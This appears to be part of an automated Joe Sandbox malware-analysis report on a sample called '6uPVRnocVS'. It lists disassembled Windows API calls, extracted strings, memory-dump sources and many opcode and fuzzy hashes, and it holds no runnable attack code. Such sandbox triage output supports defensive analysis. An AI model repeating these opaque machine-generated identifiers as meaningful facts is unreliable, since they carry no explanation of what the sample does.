                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              APIs
                                                                                                • Part of subcall function 00109DF1: GetDC.USER32(00000000), ref: 00109DF5
                                                                                                • Part of subcall function 00109DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00109E00
                                                                                                • Part of subcall function 00109DF1: ReleaseDC.USER32(00000000,00000000), ref: 00109E0B
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00109F8D
                                                                                                • Part of subcall function 0010A1E5: GetDC.USER32(00000000), ref: 0010A1EE
                                                                                                • Part of subcall function 0010A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0010A21D
                                                                                                • Part of subcall function 0010A1E5: ReleaseDC.USER32(00000000,?), ref: 0010A2B5
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F7730
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000F78CC
                                                                                                • Part of subcall function 000FA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000FA27A,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA458
                                                                                                • Part of subcall function 000FA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000FA27A,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA489
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$H_prologTime
                                                                                              • String ID: :
                                                                                              • API String ID: 1861295151-336475711
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 0-253988292
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Shell.Explorer$about:blank
                                                                                              • API String ID: 0-874089819
                                                                                              APIs
                                                                                                • Part of subcall function 000FEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000FEB92
                                                                                                • Part of subcall function 000FEB73: GetProcAddress.KERNEL32(001381C0,CryptUnprotectMemory), ref: 000FEBA2
                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,000FEBEC), ref: 000FEC84
                                                                                              Strings
                                                                                              • CryptUnprotectMemory failed, xrefs: 000FEC7C
                                                                                              • CryptProtectMemory failed, xrefs: 000FEC3B
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00010000,001009D0,?,00000000,00000000), ref: 001008AD
                                                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 001008F4
                                                                                                • Part of subcall function 000F6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F6EAF
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                              • String ID: CreateThread failed
                                                                                              • API String ID: 2655393344-3849766595
                                                                                              APIs
                                                                                                • Part of subcall function 000FDA98: _swprintf.LIBCMT ref: 000FDABE
                                                                                                • Part of subcall function 000FDA98: _strlen.LIBCMT ref: 000FDADF
                                                                                                • Part of subcall function 000FDA98: SetDlgItemTextW.USER32(?,0012E154,?), ref: 000FDB3F
                                                                                                • Part of subcall function 000FDA98: GetWindowRect.USER32(?,?), ref: 000FDB79
                                                                                                • Part of subcall function 000FDA98: GetClientRect.USER32(?,?), ref: 000FDB85
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                              • SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              • API String ID: 2622349952-4108050209
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00100A78,?), ref: 00100854
                                                                                              • GetLastError.KERNEL32(?), ref: 00100860
                                                                                                • Part of subcall function 000F6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F6EAF
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00100869
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,000FD32F,?), ref: 000FDA53
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,000FD32F,?), ref: 000FDA61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M_H
                                                                                              • API String ID: 0-372873180
                                                                                              • Instruction Fuzzy Hash: 8501F530A1950E8FDB98EFA4C4686B977E1FF69305F10447ED41EC21A4CE71A650CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 94c1ea6dd44d1d8604a8552fd41d9c5be6068453f58e5f782484edd6a6014f5f
                                                                                              • Instruction ID: ad5729d874da888a2f0b68dce718e8c688958726786bdb707a31f27a9b441bc6
                                                                                              • Opcode Fuzzy Hash: 94c1ea6dd44d1d8604a8552fd41d9c5be6068453f58e5f782484edd6a6014f5f
                                                                                              • Instruction Fuzzy Hash: 0711A770A0862D8FDFA9DB58D890BACB7B4FB18300F1045E9E41EE3250DB706B808F40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4fdcb1486341ead3b38aadb6edf3fc9518e2911dde7b2d8617e38db05f2978eb
                                                                                              • Instruction ID: 967c1e90cec6fe35338d8949f4250934fe62e2f114813a02aafbddae8cb1a99e
                                                                                              • Opcode Fuzzy Hash: 4fdcb1486341ead3b38aadb6edf3fc9518e2911dde7b2d8617e38db05f2978eb
                                                                                              • Instruction Fuzzy Hash: 0101A230A1A65E8FE761ABE498585B97BF0FF59301F0245B7D41CC70B6EB38E6948B01
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 47bdf01e2dda2119310d3585b4624fdcc78229157cd811843d68004cc45bbf5b
                                                                                              • Instruction ID: 4f25b387546a5755604bbd63cd4fcbe63a192b9823956c00663fceab5af8f512
                                                                                              • Opcode Fuzzy Hash: 47bdf01e2dda2119310d3585b4624fdcc78229157cd811843d68004cc45bbf5b
                                                                                              • Instruction Fuzzy Hash: 96017571A0E74D4FE752ABB488695A97FE0EF15300F0645F7D428C70B7DA64A658CB01
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 644b91f69f036e127256011ebbcd153e45a3d1366b55e03eccf35e36ef1bf8c3
                                                                                              • Instruction ID: 9dca7bc1ddf866dfabaeaceb580f9e539a345ec520396a68d1823ac89c365da6
                                                                                              • Opcode Fuzzy Hash: 644b91f69f036e127256011ebbcd153e45a3d1366b55e03eccf35e36ef1bf8c3
                                                                                              • Instruction Fuzzy Hash: EC014F30A1960E8AEB59AFA494695B976A0FF18305F11447ED42EC21E5DE75A650CA00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 62ad35d610e722f265e62cee33fab714e3c847c8ab2d1a55363375d78dc5a607
                                                                                              • Instruction ID: 89d3d6512b54c44c61d2d7b0f1cec46483191caf7465d35b7d637e92aaf28f7e
                                                                                              • Opcode Fuzzy Hash: 62ad35d610e722f265e62cee33fab714e3c847c8ab2d1a55363375d78dc5a607
                                                                                              • Instruction Fuzzy Hash: E3018130A1960E8BEB58EBA4D4686B97BA0FF18305F11087FD42EC21E5DE75A290CE00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2ed52e02818d5cd8c39e8ec7e810561d2a69b0ca14bba038e226e2d5db96ecd3
                                                                                              • Instruction ID: 071ac0aa5135f8a519a349711ef766edde4e34a658d3332ad92f980b8ebb7f35
                                                                                              • Opcode Fuzzy Hash: 2ed52e02818d5cd8c39e8ec7e810561d2a69b0ca14bba038e226e2d5db96ecd3
                                                                                              • Instruction Fuzzy Hash: 5701F931A1A64E8FDB94DF54C8656F97BA0FF65300F51017EE81CC21A1DBB5E550CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edaf04ac843597551be705feb99fa10b69ae83405c60625421878b633c4458f4
                                                                                              • Instruction ID: a4d32e73d01f653deab3863a161faa5f7250c00fce0729475efee14cdac16580
                                                                                              • Opcode Fuzzy Hash: edaf04ac843597551be705feb99fa10b69ae83405c60625421878b633c4458f4
                                                                                              • Instruction Fuzzy Hash: 33F0A930B1A69F49FF649BA888696FA77E4FF66314F01043ED46DC10E1DEB41614CA00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8eeb14af6980b112c3f3b1ba764b556a4541ec00f6b47acc5e9f49318b515d7b
                                                                                              • Instruction ID: 6c0036ef526ecacfc0f07885cf67978dbcf19390bd59f81d313c8cce4e76de5d
                                                                                              • Opcode Fuzzy Hash: 8eeb14af6980b112c3f3b1ba764b556a4541ec00f6b47acc5e9f49318b515d7b
                                                                                              • Instruction Fuzzy Hash: 6AF0FC31A2E55E8FEB54EFA4C4255F97790FF25309F11447AE81DC21D1CA75A550CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 54c17a788311945ca99f3683ecdcd4fdc82cc315cede11d30a9d4a1f2d733f44
                                                                                              • Instruction ID: c884887e6ace50b8932ff8f0ebc9edf040f0db951f3159d6f6be64c91894cf6c
                                                                                              • Opcode Fuzzy Hash: 54c17a788311945ca99f3683ecdcd4fdc82cc315cede11d30a9d4a1f2d733f44
                                                                                              • Instruction Fuzzy Hash: 9EF0963191E78E8FDB599FA494645A93B70BF05305F4204BBD419C60E2DB386594CB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a79ecefb716a9605666d6af681958ebd18a5fb4c93fc5598bd6bcea4591d48f
                                                                                              • Instruction ID: 3d145074c3c05744836179801fed343d23ec1113bd171b3159c69d8ced3b733b
                                                                                              • Opcode Fuzzy Hash: 4a79ecefb716a9605666d6af681958ebd18a5fb4c93fc5598bd6bcea4591d48f
                                                                                              • Instruction Fuzzy Hash: 0EF0F63091E78D8FE7699FA088252A93FA0FF55300F4100BBD428C50E1DB799554CB00
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d92a963868645d8e0d60a6e8904e59d4a087290c31c2b1e6b90da4ec26f6f549
                                                                                              • Instruction ID: 3735adc7d2f6c76be8df6b9e54f6209081972d50fcfa24b3a04a07c98405df7e
                                                                                              • Opcode Fuzzy Hash: d92a963868645d8e0d60a6e8904e59d4a087290c31c2b1e6b90da4ec26f6f549
                                                                                              • Instruction Fuzzy Hash: 2CC1E034A0A68E8FD755EF64C8685FA7BB0FF5A304F0645FBD419C70A2DA78A644CB01
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2974806a63bc7c195cd66b362af8451e4f3059198cf85898b4acd69c3991da6c
                                                                                              • Instruction ID: c485ea34f94621ae9135caa5acd30ffea049a35145a0c04f73b542410b947c8d
                                                                                              • Opcode Fuzzy Hash: 2974806a63bc7c195cd66b362af8451e4f3059198cf85898b4acd69c3991da6c
                                                                                              • Instruction Fuzzy Hash: 37B1AE30A0A64E8FEB95EF68C8696F97BF0FF19301F0105BAD419C71A6DB74A644CB40
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $.$b$}
                                                                                              • API String ID: 0-188939175
                                                                                              • Opcode ID: 8e2d2f0c3725834f9cf3627adbda2c937e9f23462e5b02b92e95415229035be7
                                                                                              • Instruction ID: d1d03f6752a9e26f407f770db4aff209a347aede3975264cd55dab00ac16e3c5
                                                                                              • Opcode Fuzzy Hash: 8e2d2f0c3725834f9cf3627adbda2c937e9f23462e5b02b92e95415229035be7
                                                                                              • Instruction Fuzzy Hash: 7071B170E0962D8FDBA8DF58C8A47E9B7B1FB58301F1141EAD40EE2291CB746A84DF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *S^I$R^s
                                                                                              • API String ID: 0-4097557823
                                                                                              • Opcode ID: 88f543034e8558df3a7c6b12d27fe123475d7a599f9b52c1b91a21e72fd1a932
                                                                                              • Instruction ID: 64a52f74d4af173f8f2d5b0fe898ec7e653e8e0472e5c6f8de36e7623a4df469
                                                                                              • Opcode Fuzzy Hash: 88f543034e8558df3a7c6b12d27fe123475d7a599f9b52c1b91a21e72fd1a932
                                                                                              • Instruction Fuzzy Hash: 50411922A0F3C50FE322A7B85C751E97FB5AF6622570D41FBD498CA0E3D9185949C3A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *S^I$R^s
                                                                                              • API String ID: 0-4097557823
                                                                                              • Opcode ID: 888e71ada772b3cacc2114ed6c3d2f47b1fbc078340dc768415a9cda09d6ac0c
                                                                                              • Instruction ID: e3e2d57d7818886c1044af23fb5aaa2c2c73f3a3a2f3eef60956e12cb29928c4
                                                                                              • Opcode Fuzzy Hash: 888e71ada772b3cacc2114ed6c3d2f47b1fbc078340dc768415a9cda09d6ac0c
                                                                                              • Instruction Fuzzy Hash: F5413B22A0E7C50FE722EBF858791E87FA1EF55315B0941FBD498CA0E7D9246944C391
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$d
                                                                                              • API String ID: 0-2113515810
                                                                                              • Opcode ID: f908a6c778f70d323190191177909e852781f43403898daff9c868aaf561ba70
                                                                                              • Instruction ID: e78738b2db3854db200918837bb0de0f7fe2f496e072fa5de743a5f899b7d19f
                                                                                              • Opcode Fuzzy Hash: f908a6c778f70d323190191177909e852781f43403898daff9c868aaf561ba70
                                                                                              • Instruction Fuzzy Hash: 5401A530A0966D8FDB69EF84D8A47A977B6BB54301F1501AAD00DE62A1CB786A84DF01
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: qO_H
                                                                                              • API String ID: 0-3424999969
                                                                                              • Opcode ID: fe867acf27243caf7b38882cbb911333a8d27040e4b4df7b586a5cd12193f594
                                                                                              • Instruction ID: b1c5705353d8427be7989cfd263a8740ba5757b4878e959b6a459c3a08a36871
                                                                                              • Opcode Fuzzy Hash: fe867acf27243caf7b38882cbb911333a8d27040e4b4df7b586a5cd12193f594
                                                                                              • Instruction Fuzzy Hash: CB915E34E0A60E8FEB69EFA4C8697FD77F1FF05300F4145BAD409D21A1DA786A849B40
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: qO_H
                                                                                              • API String ID: 0-3424999969
                                                                                              • Opcode ID: 691f84e219f74e7eb4877640efd5855f5e55852500ec73fd321885c68896dbf7
                                                                                              • Instruction ID: 1c5694a16a7a71773768e855ce80fdf752764c1c3034a1aa3cf080ff463ea96a
                                                                                              • Opcode Fuzzy Hash: 691f84e219f74e7eb4877640efd5855f5e55852500ec73fd321885c68896dbf7
                                                                                              • Instruction Fuzzy Hash: 0221D671E1661D8FEBA8DB68C8657EDB6B1FF18300F4101BAD40DE2261DB755A809F40
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Z
                                                                                              • API String ID: 0-1505515367
                                                                                              • Opcode ID: 179a2a09e40b97146a247c150d393be74be2f41e2ead43f2bfd0f2b489a2e56e
                                                                                              • Instruction ID: 08c99c44f82763dc6bbbde8c32525177e9732e1c92905883dbe458def73bd2e9
                                                                                              • Opcode Fuzzy Hash: 179a2a09e40b97146a247c150d393be74be2f41e2ead43f2bfd0f2b489a2e56e
                                                                                              • Instruction Fuzzy Hash: 25012970A0A65ECEEB64DF54C8657A977A2FB54301F1102FAC10DD22A1CB782A85DB81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Z
                                                                                              • API String ID: 0-1505515367
                                                                                              • Opcode ID: 02320863a74a6f59c220c2ca0b14fddecad5b4ba79fe3924ea4d057aff7d65e3
                                                                                              • Instruction ID: 7bfae964441350a23921563042d7051900367541e0b2846986aaeb85a6c7398e
                                                                                              • Opcode Fuzzy Hash: 02320863a74a6f59c220c2ca0b14fddecad5b4ba79fe3924ea4d057aff7d65e3
                                                                                              • Instruction Fuzzy Hash: 31012871A0A55DCEDB64DF14C8657A977A2FB94301F1002FAC10DD22A1CB746A858B41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !
                                                                                              • API String ID: 0-2657877971
                                                                                              • Opcode ID: fb75adcf7bcab10201706936d29191a6b91021910c8d74569836286434e11fd6
                                                                                              • Instruction ID: 843121fb8d9fc3f92ece18954c23945fd5ba281a510df2f6a81cada5bbbe9232
                                                                                              • Opcode Fuzzy Hash: fb75adcf7bcab10201706936d29191a6b91021910c8d74569836286434e11fd6
                                                                                              • Instruction Fuzzy Hash: 5E011930A09A6D8FDB68EF44C8A07B977B6FB54301F0501AAD00DE32A1CB786B84DF00
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7a16755d88d16b913d28c76d2ed273fee20af5d4fdc00397780769cfaebd91b
                                                                                              • Instruction ID: 247131a54381e01e1900f7d9993517256e9974a6ba07b6a50a8899fd12f3bc4f
                                                                                              • Opcode Fuzzy Hash: a7a16755d88d16b913d28c76d2ed273fee20af5d4fdc00397780769cfaebd91b
                                                                                              • Instruction Fuzzy Hash: 27229330A0A68E4FEBA5EB6488656FD7BF1FF19300F0105BEE459C31B2DE7469448751
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 711a3571fe2a168fc901b5e078ade93a5f3330933314b6990a880ad0ea7608df
                                                                                              • Instruction ID: fa07af481a0574817a0ed063290ad412410976e696951aa66a2dedfcdacb3afe
                                                                                              • Opcode Fuzzy Hash: 711a3571fe2a168fc901b5e078ade93a5f3330933314b6990a880ad0ea7608df
                                                                                              • Instruction Fuzzy Hash: 6D026D30E1965D8FEBA8EF68C8647B8B7B1FF58304F4141BAD05DD72A2CA746980DB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3bf5ecebdc8bd11c2eb37cf81a10742ebd44495b331de9f8c864c51688e96533
                                                                                              • Instruction ID: 4a6e22687437af21ffae2f5788e16284b00f3c47953eeaf65be5453fb07f5721
                                                                                              • Opcode Fuzzy Hash: 3bf5ecebdc8bd11c2eb37cf81a10742ebd44495b331de9f8c864c51688e96533
                                                                                              • Instruction Fuzzy Hash: 9B02C330A0E68E8FEBA59F6488392F97BE1FF15310F0505BFE858C61B2DE7866448751
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5dd8322259fac1d15d05ffd3bfd9e3cc9ce4a38116c4adb638cdf14588957594
                                                                                              • Instruction ID: 5862bd90e23275922799ffc6643652cdb82ac0fb2181ee8f388fdf48e9494558
                                                                                              • Opcode Fuzzy Hash: 5dd8322259fac1d15d05ffd3bfd9e3cc9ce4a38116c4adb638cdf14588957594
                                                                                              • Instruction Fuzzy Hash: D002C430A0E68E8FEBA59F6488392F97BE1FF15310F0505BFE858C61A2DE7866448751
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
